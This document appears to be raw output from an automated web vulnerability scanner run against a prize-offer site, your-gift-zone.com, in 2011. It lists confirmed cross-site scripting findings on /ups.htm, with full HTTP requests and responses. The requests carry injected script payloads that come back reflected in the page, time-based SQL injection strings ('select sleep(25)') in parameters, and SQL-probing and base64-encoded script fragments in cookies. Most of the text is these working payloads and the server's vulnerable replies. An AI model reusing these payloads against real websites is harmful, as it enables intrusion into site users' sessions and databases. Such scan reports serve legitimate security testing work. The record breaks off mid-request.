<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key='%22--%3E%3C..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET '"--></style></script><script>alert(0x0001B5)</script>
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B5)%3C/script%3E&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1--; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:05:31 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830bb2cb49bcx;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key='"--></style></script><script>netsparker(0x0001B5)</script>;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key='"--></style></script><script>netsparker(0x0001B5)</script>&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001B5)</script>&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001B5)</script>&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=(select sleep(25))a-- 1&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=(select sleep(25))a-- 1#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=(select sleep(25))a-- 1&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET "><script>alert(9)</script>
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:05:44 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830c8a4968zd9;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id="><script>netsparker(9)</script>&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&promo_name=2192name&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id="><script>netsparker(9)</script>&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET '"--></style></script><script>alert(0x0001BF)</script>
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BF)%3C/script%3E&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
